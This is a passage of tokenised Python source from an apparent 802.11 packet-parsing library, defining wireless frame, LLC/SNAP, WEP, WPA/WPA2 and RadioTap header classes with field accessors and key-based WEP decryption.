"<STR_LIT>" <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT:6> ) : <EOL> self . header . set_byte ( <NUM_LIT:2> + i , value [ i ] ) <EOL> def get_ta ( self ) : <EOL> "<STR_LIT>" <EOL> return self . header . get_bytes ( ) [ <NUM_LIT:8> : <NUM_LIT> ] <EOL> def set_ta ( self , value ) : <EOL> "<STR_LIT>" <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT:6> ) : <EOL> self . header . set_byte ( <NUM_LIT:8> + i , value [ i ] ) <EOL> class Dot11ControlFramePSPoll ( ProtocolPacket ) : <EOL> "<STR_LIT>" <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = <NUM_LIT> <EOL> tail_size = <NUM_LIT:0> <EOL> ProtocolPacket . __init__ ( self , header_size , tail_size ) <EOL> if ( aBuffer ) : <EOL> self . load_packet ( aBuffer ) <EOL> def get_aid ( self ) : <EOL> "<STR_LIT>" <EOL> b = self . header . get_word ( <NUM_LIT:0> , "<STR_LIT:<>" ) <EOL> return b <EOL> def set_aid ( self , value ) : <EOL> "<STR_LIT>" <EOL> nb = value & <NUM_LIT> <EOL> self . header . set_word ( <NUM_LIT:0> , nb , "<STR_LIT:<>" ) <EOL> def get_bssid ( self ) : <EOL> "<STR_LIT>" <EOL> return self . header . get_bytes ( ) [ <NUM_LIT:2> : <NUM_LIT:8> ] <EOL> def set_bssid ( self , value ) : <EOL> "<STR_LIT>" <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT:6> ) : <EOL> self . header . set_byte ( <NUM_LIT:2> + i , value [ i ] ) <EOL> def get_ta ( self ) : <EOL> "<STR_LIT>" <EOL> return self . header . get_bytes ( ) [ <NUM_LIT:8> : <NUM_LIT> ] <EOL> def set_ta ( self , value ) : <EOL> "<STR_LIT>" <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT:6> ) : <EOL> self . header . set_byte ( <NUM_LIT:8> + i , value [ i ] ) <EOL> class Dot11ControlFrameCFEnd ( ProtocolPacket ) : <EOL> "<STR_LIT>" <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = <NUM_LIT> <EOL> tail_size = <NUM_LIT:0> <EOL> ProtocolPacket . __init__ ( self , header_size , tail_size ) <EOL> if ( aBuffer ) : <EOL> self . load_packet ( aBuffer ) <EOL> def get_duration ( self ) : <EOL> "<STR_LIT>" <EOL> b = self . header . get_word ( <NUM_LIT:0> , "<STR_LIT:<>" ) <EOL> return b <EOL> def set_duration ( self , value ) : <EOL> "<STR_LIT>" <EOL> nb = value & <NUM_LIT> <EOL> self . header . set_word ( <NUM_LIT:0> , nb , "<STR_LIT:<>" ) <EOL> def get_ra ( self ) : <EOL> "<STR_LIT>" <EOL> return self . header . get_bytes ( ) [ <NUM_LIT:2> : <NUM_LIT:8> ] <EOL> def set_ra ( self , value ) : <EOL> "<STR_LIT>" <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT:6> ) : <EOL> self . header . set_byte ( <NUM_LIT:2> + i , value [ i ] ) <EOL> def get_bssid ( self ) : <EOL> "<STR_LIT>" <EOL> return self . header . get_bytes ( ) [ <NUM_LIT:8> : <NUM_LIT> ] <EOL> def set_bssid ( self , value ) : <EOL> "<STR_LIT>" <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT:6> ) : <EOL> self . header . set_byte ( <NUM_LIT:8> + i , value [ i ] ) <EOL> class Dot11ControlFrameCFEndCFACK ( ProtocolPacket ) : <EOL> '<STR_LIT>' <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = <NUM_LIT> <EOL> tail_size = <NUM_LIT:0> <EOL> ProtocolPacket . __init__ ( self , header_size , tail_size ) <EOL> if ( aBuffer ) : <EOL> self . load_packet ( aBuffer ) <EOL> def get_duration ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_word ( <NUM_LIT:0> , "<STR_LIT:<>" ) <EOL> return b <EOL> def set_duration ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = value & <NUM_LIT> <EOL> self . header . set_word ( <NUM_LIT:0> , nb , "<STR_LIT:<>" ) <EOL> def get_ra ( self ) : <EOL> '<STR_LIT>' <EOL> return self . header . get_bytes ( ) [ <NUM_LIT:2> : <NUM_LIT:8> ] <EOL> def set_ra ( self , value ) : <EOL> '<STR_LIT>' <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT:6> ) : <EOL> self . header . set_byte ( <NUM_LIT:2> + i , value [ i ] ) <EOL> def get_bssid ( self ) : <EOL> '<STR_LIT>' <EOL> return self . header . get_bytes ( ) [ <NUM_LIT:8> : <NUM_LIT:16> ] <EOL> def set_bssid ( self , value ) : <EOL> '<STR_LIT>' <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT:6> ) : <EOL> self . header . set_byte ( <NUM_LIT:8> + i , value [ i ] ) <EOL> class Dot11DataFrame ( ProtocolPacket ) : <EOL> '<STR_LIT>' <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = <NUM_LIT> <EOL> tail_size = <NUM_LIT:0> <EOL> ProtocolPacket . __init__ ( self , header_size , tail_size ) <EOL> if ( aBuffer ) : <EOL> self . load_packet ( aBuffer ) <EOL> def get_duration ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_word ( <NUM_LIT:0> , "<STR_LIT:<>" ) <EOL> return b <EOL> def set_duration ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = value & <NUM_LIT> <EOL> self . header . set_word ( <NUM_LIT:0> , nb , "<STR_LIT:<>" ) <EOL> def get_address1 ( self ) : <EOL> '<STR_LIT>' <EOL> return self . header . get_bytes ( ) [ <NUM_LIT:2> : <NUM_LIT:8> ] <EOL> def set_address1 ( self , value ) : <EOL> '<STR_LIT>' <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT:6> ) : <EOL> self . header . set_byte ( <NUM_LIT:2> + i , value [ i ] ) <EOL> def get_address2 ( self ) : <EOL> '<STR_LIT>' <EOL> return self . header . get_bytes ( ) [ <NUM_LIT:8> : <NUM_LIT> ] <EOL> def set_address2 ( self , value ) : <EOL> '<STR_LIT>' <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT:6> ) : <EOL> self . header . set_byte ( <NUM_LIT:8> + i , value [ i ] ) <EOL> def get_address3 ( self ) : <EOL> '<STR_LIT>' <EOL> return self . header . get_bytes ( ) [ <NUM_LIT> : <NUM_LIT:20> ] <EOL> def set_address3 ( self , value ) : <EOL> '<STR_LIT>' <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT:6> ) : <EOL> self . header . set_byte ( <NUM_LIT> + i , value [ i ] ) <EOL> def get_sequence_control ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_word ( <NUM_LIT:20> , "<STR_LIT:<>" ) <EOL> return b <EOL> def set_sequence_control ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = value & <NUM_LIT> <EOL> self . header . set_word ( <NUM_LIT:20> , nb , "<STR_LIT:<>" ) <EOL> def get_fragment_number ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_word ( <NUM_LIT:20> , "<STR_LIT:<>" ) <EOL> return ( b & <NUM_LIT> ) <EOL> def set_fragment_number ( self , value ) : <EOL> '<STR_LIT>' <EOL> mask = ( ~ <NUM_LIT> ) & <NUM_LIT> <EOL> masked = self . header . get_word ( <NUM_LIT:20> , "<STR_LIT:<>" ) & mask <EOL> nb = masked | ( value & <NUM_LIT> ) <EOL> self . header . set_word ( <NUM_LIT:20> , nb , "<STR_LIT:<>" ) <EOL> def get_sequence_number ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_word ( <NUM_LIT:20> , "<STR_LIT:<>" ) <EOL> return ( ( b >> <NUM_LIT:4> ) & <NUM_LIT> ) <EOL> def set_sequence_number ( self , value ) : <EOL> '<STR_LIT>' <EOL> mask = ( ~ <NUM_LIT> ) & <NUM_LIT> <EOL> masked = self . header . get_word ( <NUM_LIT:20> , "<STR_LIT:<>" ) & mask <EOL> nb = masked | ( ( value & <NUM_LIT> ) << <NUM_LIT:4> ) <EOL> self . header . set_word ( <NUM_LIT:20> , nb , "<STR_LIT:<>" ) <EOL> def get_frame_body ( self ) : <EOL> '<STR_LIT>' <EOL> return self . get_body_as_string ( ) <EOL> def set_frame_body ( self , data ) : <EOL> '<STR_LIT>' <EOL> self . load_body ( data ) <EOL> class Dot11DataQoSFrame ( Dot11DataFrame ) : <EOL> '<STR_LIT>' <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = <NUM_LIT> <EOL> tail_size = <NUM_LIT:0> <EOL> ProtocolPacket . __init__ ( self , header_size , tail_size ) <EOL> if ( aBuffer ) : <EOL> self . load_packet ( aBuffer ) <EOL> def get_QoS ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_word ( <NUM_LIT> , "<STR_LIT:<>" ) <EOL> return b <EOL> def set_QoS ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = value & <NUM_LIT> <EOL> self . header . set_word ( <NUM_LIT> , nb , "<STR_LIT:<>" ) <EOL> class Dot11DataAddr4Frame ( Dot11DataFrame ) : <EOL> '<STR_LIT>' <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = <NUM_LIT> <EOL> tail_size = <NUM_LIT:0> <EOL> ProtocolPacket . __init__ ( self , header_size , tail_size ) <EOL> if ( aBuffer ) : <EOL> self . load_packet ( aBuffer ) <EOL> def get_address4 ( self ) : <EOL> '<STR_LIT>' <EOL> return self . header . get_bytes ( ) [ <NUM_LIT> : <NUM_LIT> ] <EOL> def set_address4 ( self , value ) : <EOL> '<STR_LIT>' <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT:6> ) : <EOL> self . header . set_byte ( <NUM_LIT> + i , value [ i ] ) <EOL> class Dot11DataAddr4QoSFrame ( Dot11DataAddr4Frame ) : <EOL> '<STR_LIT>' <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = <NUM_LIT:30> <EOL> tail_size = <NUM_LIT:0> <EOL> ProtocolPacket . __init__ ( self , header_size , tail_size ) <EOL> if ( aBuffer ) : <EOL> self . load_packet ( aBuffer ) <EOL> def get_QoS ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_word ( <NUM_LIT> , "<STR_LIT:<>" ) <EOL> return b <EOL> def set_QoS ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = value & <NUM_LIT> <EOL> self . header . set_word ( <NUM_LIT> , nb , "<STR_LIT:<>" ) <EOL> class SAPTypes ( ) : <EOL> NULL = <NUM_LIT> <EOL> LLC_SLMGMT = <NUM_LIT> <EOL> SNA_PATHCTRL = <NUM_LIT> <EOL> IP = <NUM_LIT> <EOL> SNA1 = <NUM_LIT> <EOL> SNA2 = <NUM_LIT> <EOL> PROWAY_NM_INIT = <NUM_LIT> <EOL> NETWARE1 = <NUM_LIT> <EOL> OSINL1 = <NUM_LIT> <EOL> TI = <NUM_LIT> <EOL> OSINL2 = <NUM_LIT> <EOL> OSINL3 = <NUM_LIT> <EOL> SNA3 = <NUM_LIT> <EOL> BPDU = <NUM_LIT> <EOL> RS511 = <NUM_LIT> <EOL> OSINL4 = <NUM_LIT> <EOL> X25 = <NUM_LIT> <EOL> XNS = <NUM_LIT> <EOL> BACNET = <NUM_LIT> <EOL> NESTAR = <NUM_LIT> <EOL> PROWAY_ASLM = <NUM_LIT> <EOL> ARP = <NUM_LIT> <EOL> SNAP = <NUM_LIT> <EOL> HPJD = <NUM_LIT> <EOL> VINES1 = <NUM_LIT> <EOL> VINES2 = <NUM_LIT> <EOL> NETWARE2 = <NUM_LIT> <EOL> NETBIOS = <NUM_LIT> <EOL> IBMNM = <NUM_LIT> <EOL> HPEXT = <NUM_LIT> <EOL> UB = <NUM_LIT> <EOL> RPL = <NUM_LIT> <EOL> OSINL5 = <NUM_LIT> <EOL> GLOBAL = <NUM_LIT> <EOL> class LLC ( ProtocolPacket ) : <EOL> '<STR_LIT>' <EOL> DLC_UNNUMBERED_FRAMES = <NUM_LIT> <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = <NUM_LIT:3> <EOL> tail_size = <NUM_LIT:0> <EOL> ProtocolPacket . __init__ ( self , header_size , tail_size ) <EOL> if ( aBuffer ) : <EOL> self . load_packet ( aBuffer ) <EOL> def get_DSAP ( self ) : <EOL> "<STR_LIT>" <EOL> return self . header . get_byte ( <NUM_LIT:0> ) <EOL> def set_DSAP ( self , value ) : <EOL> "<STR_LIT>" <EOL> self . header . set_byte ( <NUM_LIT:0> , value ) <EOL> def get_SSAP ( self ) : <EOL> "<STR_LIT>" <EOL> return self . header . get_byte ( <NUM_LIT:1> ) <EOL> def set_SSAP ( self , value ) : <EOL> "<STR_LIT>" <EOL> self . header . set_byte ( <NUM_LIT:1> , value ) <EOL> def get_control ( self ) : <EOL> "<STR_LIT>" <EOL> return self . header . get_byte ( <NUM_LIT:2> ) <EOL> def set_control ( self , value ) : <EOL> "<STR_LIT>" <EOL> self . header . set_byte ( <NUM_LIT:2> , value ) <EOL> class SNAP ( ProtocolPacket ) : <EOL> '<STR_LIT>' <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = <NUM_LIT:5> <EOL> tail_size = <NUM_LIT:0> <EOL> ProtocolPacket . __init__ ( self , header_size , tail_size ) <EOL> if ( aBuffer ) : <EOL> self . load_packet ( aBuffer ) <EOL> def get_OUI ( self ) : <EOL> "<STR_LIT>" <EOL> b = self . header . get_bytes ( ) [ <NUM_LIT:0> : <NUM_LIT:3> ] . tostring ( ) <EOL> ( oui , ) = struct . unpack ( '<STR_LIT>' , '<STR_LIT:\x00>' + b ) <EOL> return oui <EOL> def set_OUI ( self , value ) : <EOL> "<STR_LIT>" <EOL> mask = ( ( ~ <NUM_LIT> ) & <NUM_LIT> ) <EOL> masked = self . header . get_long ( <NUM_LIT:0> , "<STR_LIT:>>" ) & mask <EOL> nb = masked | ( ( value & <NUM_LIT> ) << <NUM_LIT:8> ) <EOL> self . header . set_long ( <NUM_LIT:0> , nb ) <EOL> def get_protoID ( self ) : <EOL> "<STR_LIT>" <EOL> return self . header . get_word ( <NUM_LIT:3> , "<STR_LIT:>>" ) <EOL> def set_protoID ( self , value ) : <EOL> "<STR_LIT>" <EOL> self . header . set_word ( <NUM_LIT:3> , value , "<STR_LIT:>>" ) <EOL> class Dot11WEP ( ProtocolPacket ) : <EOL> '<STR_LIT>' <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = <NUM_LIT:4> <EOL> tail_size = <NUM_LIT:0> <EOL> ProtocolPacket . __init__ ( self , header_size , tail_size ) <EOL> if ( aBuffer ) : <EOL> self . load_packet ( aBuffer ) <EOL> def is_WEP ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_byte ( <NUM_LIT:3> ) <EOL> return not ( b & <NUM_LIT> ) <EOL> def get_iv ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_bytes ( ) [ <NUM_LIT:0> : <NUM_LIT:3> ] . tostring ( ) <EOL> ( iv , ) = struct . unpack ( '<STR_LIT>' , '<STR_LIT:\x00>' + b ) <EOL> return iv <EOL> def set_iv ( self , value ) : <EOL> '<STR_LIT>' <EOL> mask = ( ( ~ <NUM_LIT> ) & <NUM_LIT> ) <EOL> masked = self . header . get_long ( <NUM_LIT:0> , "<STR_LIT:>>" ) & mask <EOL> nb = masked | ( ( value & <NUM_LIT> ) << <NUM_LIT:8> ) <EOL> self . header . set_long ( <NUM_LIT:0> , nb ) <EOL> def get_keyid ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_byte ( <NUM_LIT:3> ) <EOL> return ( ( b >> <NUM_LIT:6> ) & <NUM_LIT> ) <EOL> def set_keyid ( self , value ) : <EOL> '<STR_LIT>' <EOL> mask = ( ~ <NUM_LIT> ) & <NUM_LIT> <EOL> masked = self . header . get_byte ( <NUM_LIT:3> ) & mask <EOL> nb = masked | ( ( value & <NUM_LIT> ) << <NUM_LIT:6> ) <EOL> self . header . set_byte ( <NUM_LIT:3> , nb ) <EOL> def get_decrypted_data ( self , key_string ) : <EOL> '<STR_LIT>' <EOL> if len ( self . body_string ) < <NUM_LIT:8> : <EOL> return self . body_string <EOL> iv = struct . pack ( '<STR_LIT>' , self . get_iv ( ) ) [ - <NUM_LIT:3> : ] <EOL> key = iv + key_string <EOL> rc4 = RC4 ( key ) <EOL> decrypted_data = rc4 . decrypt ( self . body_string ) <EOL> return decrypted_data <EOL> def get_encrypted_data ( self , key_string ) : <EOL> return self . get_decrypted_data ( key_string ) <EOL> def encrypt_frame ( self , key_string ) : <EOL> enc = self . get_encrypted_data ( key_string ) <EOL> self . load_body ( enc ) <EOL> class Dot11WEPData ( ProtocolPacket ) : <EOL> '<STR_LIT>' <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = <NUM_LIT:0> <EOL> tail_size = <NUM_LIT:4> <EOL> ProtocolPacket . __init__ ( self , header_size , tail_size ) <EOL> if ( aBuffer ) : <EOL> self . load_packet ( aBuffer ) <EOL> def get_icv ( self ) : <EOL> "<STR_LIT>" <EOL> b = self . tail . get_long ( - <NUM_LIT:4> , "<STR_LIT:>>" ) <EOL> return b <EOL> def set_icv ( self , value = None ) : <EOL> "<STR_LIT>" <EOL> if value is None : <EOL> value = self . get_computed_icv ( ) <EOL> nb = value & <NUM_LIT> <EOL> self . tail . set_long ( - <NUM_LIT:4> , nb ) <EOL> def get_computed_icv ( self ) : <EOL> crcle = crc32 ( self . body_string ) & <NUM_LIT> L <EOL> crc = struct . pack ( '<STR_LIT>' , crcle ) <EOL> ( crc_long , ) = struct . unpack ( '<STR_LIT>' , crc ) <EOL> return crc_long <EOL> def check_icv ( self ) : <EOL> computed_icv = self . get_computed_icv ( ) <EOL> current_icv = self . get_icv ( ) <EOL> if computed_icv == current_icv : <EOL> return True <EOL> else : <EOL> return False <EOL> class Dot11WPA ( ProtocolPacket ) : <EOL> '<STR_LIT>' <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = <NUM_LIT:8> <EOL> tail_size = <NUM_LIT:0> <EOL> ProtocolPacket . __init__ ( self , header_size , tail_size ) <EOL> if ( aBuffer ) : <EOL> self . load_packet ( aBuffer ) <EOL> def is_WPA ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . get_WEPSeed ( ) == ( ( self . get_TSC1 ( ) | <NUM_LIT> ) & <NUM_LIT> ) <EOL> return ( b and self . get_extIV ( ) ) <EOL> def get_keyid ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_byte ( <NUM_LIT:3> ) <EOL> return ( ( b >> <NUM_LIT:6> ) & <NUM_LIT> ) <EOL> def set_keyid ( self , value ) : <EOL> '<STR_LIT>' <EOL> mask = ( ~ <NUM_LIT> ) & <NUM_LIT> <EOL> masked = self . header . get_byte ( <NUM_LIT:3> ) & mask <EOL> nb = masked | ( ( value & <NUM_LIT> ) << <NUM_LIT:6> ) <EOL> self . header . set_byte ( <NUM_LIT:3> , nb ) <EOL> def get_decrypted_data ( self ) : <EOL> '<STR_LIT>' <EOL> return self . body_string <EOL> def get_TSC1 ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_byte ( <NUM_LIT:0> ) <EOL> return ( b & <NUM_LIT> ) <EOL> def set_TSC1 ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = ( value & <NUM_LIT> ) <EOL> self . header . set_byte ( <NUM_LIT:0> , nb ) <EOL> def get_WEPSeed ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_byte ( <NUM_LIT:1> ) <EOL> return ( b & <NUM_LIT> ) <EOL> def set_WEPSeed ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = ( value & <NUM_LIT> ) <EOL> self . header . set_byte ( <NUM_LIT:1> , nb ) <EOL> def get_TSC0 ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_byte ( <NUM_LIT:2> ) <EOL> return ( b & <NUM_LIT> ) <EOL> def set_TSC0 ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = ( value & <NUM_LIT> ) <EOL> self . header . set_byte ( <NUM_LIT:2> , nb ) <EOL> def get_extIV ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_byte ( <NUM_LIT:3> ) <EOL> return ( ( b >> <NUM_LIT:5> ) & <NUM_LIT> ) <EOL> def set_extIV ( self , value ) : <EOL> '<STR_LIT>' <EOL> mask = ( ~ <NUM_LIT> ) & <NUM_LIT> <EOL> masked = self . header . get_byte ( <NUM_LIT:3> ) & mask <EOL> nb = masked | ( ( value & <NUM_LIT> ) << <NUM_LIT:5> ) <EOL> self . header . set_byte ( <NUM_LIT:3> , nb ) <EOL> def get_TSC2 ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_byte ( <NUM_LIT:4> ) <EOL> return ( b & <NUM_LIT> ) <EOL> def set_TSC2 ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = ( value & <NUM_LIT> ) <EOL> self . header . set_byte ( <NUM_LIT:4> , nb ) <EOL> def get_TSC3 ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_byte ( <NUM_LIT:5> ) <EOL> return ( b & <NUM_LIT> ) <EOL> def set_TSC3 ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = ( value & <NUM_LIT> ) <EOL> self . header . set_byte ( <NUM_LIT:5> , nb ) <EOL> def get_TSC4 ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_byte ( <NUM_LIT:6> ) <EOL> return ( b & <NUM_LIT> ) <EOL> def set_TSC4 ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = ( value & <NUM_LIT> ) <EOL> self . header . set_byte ( <NUM_LIT:6> , nb ) <EOL> def get_TSC5 ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_byte ( <NUM_LIT:7> ) <EOL> return ( b & <NUM_LIT> ) <EOL> def set_TSC5 ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = ( value & <NUM_LIT> ) <EOL> self . header . set_byte ( <NUM_LIT:7> , nb ) <EOL> class Dot11WPAData ( ProtocolPacket ) : <EOL> '<STR_LIT>' <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = <NUM_LIT:0> <EOL> tail_size = <NUM_LIT:12> <EOL> ProtocolPacket . __init__ ( self , header_size , tail_size ) <EOL> if ( aBuffer ) : <EOL> self . load_packet ( aBuffer ) <EOL> def get_icv ( self ) : <EOL> "<STR_LIT>" <EOL> b = self . tail . get_long ( - <NUM_LIT:4> , "<STR_LIT:>>" ) <EOL> return b <EOL> def set_icv ( self , value = None ) : <EOL> "<STR_LIT>" <EOL> if value is None : <EOL> value = self . compute_checksum ( self . body_string ) <EOL> nb = value & <NUM_LIT> <EOL> self . tail . set_long ( - <NUM_LIT:4> , nb ) <EOL> def get_MIC ( self ) : <EOL> '<STR_LIT>' <EOL> return self . get_tail_as_string ( ) [ : <NUM_LIT:8> ] <EOL> def set_MIC ( self , value ) : <EOL> '<STR_LIT>' <EOL> value . ljust ( <NUM_LIT:8> , '<STR_LIT:\x00>' ) <EOL> value = value [ : <NUM_LIT:8> ] <EOL> icv = self . tail . get_buffer_as_string ( ) [ - <NUM_LIT:4> : ] <EOL> self . tail . set_bytes_from_string ( value + icv ) <EOL> class Dot11WPA2 ( ProtocolPacket ) : <EOL> '<STR_LIT>' <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = <NUM_LIT:8> <EOL> tail_size = <NUM_LIT:0> <EOL> ProtocolPacket . __init__ ( self , header_size , tail_size ) <EOL> if ( aBuffer ) : <EOL> self . load_packet ( aBuffer ) <EOL> def is_WPA2 ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . get_PN1 ( ) == ( ( self . get_PN0 ( ) | <NUM_LIT> ) & <NUM_LIT> ) <EOL> return ( not b and self . get_extIV ( ) ) <EOL> def get_extIV ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_byte ( <NUM_LIT:3> ) <EOL> return ( ( b >> <NUM_LIT:5> ) & <NUM_LIT> ) <EOL> def set_extIV ( self , value ) : <EOL> '<STR_LIT>' <EOL> mask = ( ~ <NUM_LIT> ) & <NUM_LIT> <EOL> masked = self . header . get_byte ( <NUM_LIT:3> ) & mask <EOL> nb = masked | ( ( value & <NUM_LIT> ) << <NUM_LIT:5> ) <EOL> self . header . set_byte ( <NUM_LIT:3> , nb ) <EOL> def get_keyid ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_byte ( <NUM_LIT:3> ) <EOL> return ( ( b >> <NUM_LIT:6> ) & <NUM_LIT> ) <EOL> def set_keyid ( self , value ) : <EOL> '<STR_LIT>' <EOL> mask = ( ~ <NUM_LIT> ) & <NUM_LIT> <EOL> masked = self . header . get_byte ( <NUM_LIT:3> ) & mask <EOL> nb = masked | ( ( value & <NUM_LIT> ) << <NUM_LIT:6> ) <EOL> self . header . set_byte ( <NUM_LIT:3> , nb ) <EOL> def get_decrypted_data ( self ) : <EOL> '<STR_LIT>' <EOL> return self . body_string <EOL> def get_PN0 ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_byte ( <NUM_LIT:0> ) <EOL> return ( b & <NUM_LIT> ) <EOL> def set_PN0 ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = ( value & <NUM_LIT> ) <EOL> self . header . set_byte ( <NUM_LIT:0> , nb ) <EOL> def get_PN1 ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_byte ( <NUM_LIT:1> ) <EOL> return ( b & <NUM_LIT> ) <EOL> def set_PN1 ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = ( value & <NUM_LIT> ) <EOL> self . header . set_byte ( <NUM_LIT:1> , nb ) <EOL> def get_PN2 ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_byte ( <NUM_LIT:4> ) <EOL> return ( b & <NUM_LIT> ) <EOL> def set_PN2 ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = ( value & <NUM_LIT> ) <EOL> self . header . set_byte ( <NUM_LIT:4> , nb ) <EOL> def get_PN3 ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_byte ( <NUM_LIT:5> ) <EOL> return ( b & <NUM_LIT> ) <EOL> def set_PN3 ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = ( value & <NUM_LIT> ) <EOL> self . header . set_byte ( <NUM_LIT:5> , nb ) <EOL> def get_PN4 ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_byte ( <NUM_LIT:6> ) <EOL> return ( b & <NUM_LIT> ) <EOL> def set_PN4 ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = ( value & <NUM_LIT> ) <EOL> self . header . set_byte ( <NUM_LIT:6> , nb ) <EOL> def get_PN5 ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_byte ( <NUM_LIT:7> ) <EOL> return ( b & <NUM_LIT> ) <EOL> def set_PN5 ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = ( value & <NUM_LIT> ) <EOL> self . header . set_byte ( <NUM_LIT:7> , nb ) <EOL> class Dot11WPA2Data ( ProtocolPacket ) : <EOL> '<STR_LIT>' <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = <NUM_LIT:0> <EOL> tail_size = <NUM_LIT:8> <EOL> ProtocolPacket . __init__ ( self , header_size , tail_size ) <EOL> if ( aBuffer ) : <EOL> self . load_packet ( aBuffer ) <EOL> def get_MIC ( self ) : <EOL> '<STR_LIT>' <EOL> return self . get_tail_as_string ( ) <EOL> def set_MIC ( self , value ) : <EOL> '<STR_LIT>' <EOL> value . ljust ( <NUM_LIT:8> , '<STR_LIT:\x00>' ) <EOL> value = value [ : <NUM_LIT:8> ] <EOL> self . tail . set_bytes_from_string ( value ) <EOL> class RadioTap ( ProtocolPacket ) : <EOL> __HEADER_BASE_SIZE = <NUM_LIT:8> <EOL> _PRESENT_FLAGS_SIZE = <NUM_LIT:4> <EOL> _BASE_PRESENT_FLAGS_OFFSET = <NUM_LIT:4> <EOL> class __RadioTapField ( object ) : <EOL> ALIGNMENT = <NUM_LIT:1> <EOL> def __str__ ( self ) : <EOL> return str ( self . __class__ . __name__ ) <EOL> class RTF_TSFT ( __RadioTapField ) : <EOL> BIT_NUMBER = <NUM_LIT:0> <EOL> STRUCTURE = "<STR_LIT>" <EOL> ALIGNMENT = <NUM_LIT:8> <EOL> class RTF_FLAGS ( __RadioTapField ) : <EOL> BIT_NUMBER = <NUM_LIT:1> <EOL> STRUCTURE = "<STR_LIT>" <EOL> PROPERTY_CFP = <NUM_LIT> <EOL> PROPERTY_SHORTPREAMBLE = <NUM_LIT> <EOL> PROPERTY_WEP = <NUM_LIT> <EOL> PROPERTY_FRAGMENTATION = <NUM_LIT> <EOL> PROPERTY_FCS_AT_END = <NUM_LIT> <EOL> PROPERTY_PAYLOAD_PADDING = <NUM_LIT> <EOL> PROPERTY_BAD_FCS = <NUM_LIT> <EOL> PROPERTY_SHORT_GI = <NUM_LIT> <EOL> class RTF_RATE ( __RadioTapField ) : <EOL> BIT_NUMBER = <NUM_LIT:2> <EOL> STRUCTURE = "<STR_LIT>" <EOL> class RTF_CHANNEL ( __RadioTapField ) : <EOL> BIT_NUMBER = <NUM_LIT:3> <EOL> STRUCTURE = "<STR_LIT>" <EOL> ALIGNMENT = <NUM_LIT:2> <EOL> class RTF_FHSS ( __RadioTapField ) : <EOL> BIT_NUMBER = <NUM_LIT:4> <EOL> STRUCTURE = "<STR_LIT>" <EOL> class RTF_DBM_ANTSIGNAL ( __RadioTapField ) : <EOL> BIT_NUMBER = <NUM_LIT:5> <EOL> STRUCTURE = "<STR_LIT>" <EOL> class 